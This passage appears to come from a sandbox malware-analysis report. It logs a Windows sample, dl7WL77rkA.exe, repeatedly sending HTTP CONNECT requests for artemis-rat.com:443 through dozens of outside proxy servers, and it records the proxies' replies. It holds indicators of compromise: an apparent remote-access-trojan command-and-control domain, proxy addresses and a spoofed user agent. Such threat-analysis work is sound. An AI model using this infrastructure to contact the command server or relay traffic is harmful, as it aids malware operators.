                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            613192.168.2.55180672.210.252.13741453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.980407953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            614192.168.2.55181172.195.34.35273603876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.980411053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            615192.168.2.551739103.231.45.14510803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.981930971 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            616192.168.2.551793115.146.225.137100463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.981931925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            617192.168.2.55180094.131.14.6610813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.982175112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            618192.168.2.55178491.202.230.21980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.982352972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            619192.168.2.55182738.162.19.22731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.983340025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.398072958 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            620192.168.2.55178545.11.95.16660093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.983649969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.479053974 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            621192.168.2.551155117.160.250.163823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.983942986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701843023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.548237085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202133894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.161202908 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.161174059 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            622192.168.2.55181358.234.116.19781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.988347054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            623192.168.2.55182470.166.167.38577283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.988594055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            624192.168.2.551799138.36.150.2610803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.988960028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
625192.168.2.551808121.41.66.24280813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.990400076 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:40.321501017 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
626192.168.2.55182972.195.114.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.990400076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
627192.168.2.55086251.15.234.222163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.999111891 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.108052015 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.555661917 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port as an HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, not an HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPort configuration option in place of, or in addition to, SOCKSPort. Please confi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
628192.168.2.551667148.72.206.250140763876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.001502037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.779822111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.092638969 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.405534029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.999075890 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.592834949 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.202116966 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
629192.168.2.551831147.75.92.251100893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.002300024 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:40.284285069 CET | 65 | IN | HTTP/1.1 200 Connection Established
Proxy-Agent: Zscaler/6.3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
630192.168.2.55087451.158.125.135163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.015259981 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.093031883 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.202440977 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.202210903 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.561347008 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port as an HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, not an HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPort configuration option in place of, or in addition to, SOCKSPort. Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            631192.168.2.55181213.234.24.11610803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.020499945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.405863047 CET | 116 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            632192.168.2.55182395.140.124.16110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.023770094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
633 | 192.168.2.5 | 50956 | 138.0.228.120 | 8080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.029817104 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.369398117 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
634 | 192.168.2.5 | 50905 | 185.23.118.97 | 57377 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.054480076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.093034983 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.202419996 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.202212095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
635 | 192.168.2.5 | 51002 | 194.4.50.132 | 12334 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.060780048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
636 | 192.168.2.5 | 51071 | 194.182.178.90 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.094304085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.426320076 CET | 28 | IN | HTTP/1.1 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
637 | 192.168.2.5 | 50926 | 203.96.177.211 | 33382 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.095067978 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.108166933 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.124727011 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.217721939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            638192.168.2.551842139.59.1.1480803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.095366955 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.690907955 CET | 28 | IN | HTTP/1.1 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
639 | 192.168.2.5 | 51837 | 43.133.136.208 | 8800 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.096627951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
640 | 192.168.2.5 | 50936 | 161.97.173.42 | 62289 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.096688986 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.108165979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
